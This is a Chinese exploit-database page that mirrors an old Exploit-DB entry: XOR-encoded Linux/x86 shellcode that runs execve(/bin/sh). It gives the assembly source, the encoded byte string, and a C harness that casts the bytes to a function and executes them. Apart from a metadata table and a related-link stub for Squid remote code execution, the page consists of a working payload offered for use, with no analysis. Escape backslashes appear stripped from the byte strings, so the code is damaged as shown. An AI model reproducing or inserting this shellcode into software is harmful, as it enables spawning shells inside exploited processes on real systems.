Linux/x86 – execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)-安全小百科

Linux/x86 – execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)

漏洞ID	1054600	漏洞类型
发布时间	2004-09-12	更新时间	2004-09-12
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13456

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
.file "xor-encrypted shellcode"
.version "1.0"
.text
	.align 4
.globl main
	.type main,@function
_start:
	xorl	%eax,%eax
	jmp    	0x22
	popl   	%ebx	
	movl	8(%ebx),%edx
	xor	%edx,(%ebx)
	xor	%edx,4(%ebx)
	xor	%edx,%edx
	movl   	%ebx,0x8(%esp)
	movl   	%edx,0xc(%esp)
	movb   	$0xb,%al
	leal   	0x8(%esp),%ecx
	int    	$0x80
	xorl   	%ebx,%ebx
	movl   	%ebx,%eax
	incl   	%eax
	int   	$0x80
	call	-0x27
	.string "x6ex23x28x2fx6ex32x29x41x41x41x41x41"
*/

#define NAME "encrypted"

char code[]=
"x31xc0xebx22x5bx8bx53x08x31x13x31x53x04x31xd2x89"
"x5cx24x08x89x54x24x0cxb0x0bx8dx4cx24x08xcdx80x31"
"xdbx89xd8x40xcdx80xe8xd9xffxffxff"
"x6ex23x28x2fx6ex32x29x41" /* encrypted "/bin/sh" */
"x41x41x41x41";     /* Conversion chars */

main()
{
  int (*funct)();
  funct = (int (*)()) code;
  printf("%s shellcodentSize = %dn",NAME,strlen(code));
  (int)(*funct)();
}

// milw0rm.com [2004-09-12]

相关推荐: Multiple Squid Remote Code Execution Vulnerabilities

Multiple Squid Remote Code Execution Vulnerabilities 漏洞ID 1101851 漏洞类型 Unknown 发布时间 2002-07-03 更新时间 2002-07-03 CVE编号 N/A CNNVD-ID …

文章版权归作者所有，未经允许请勿转载。

THE END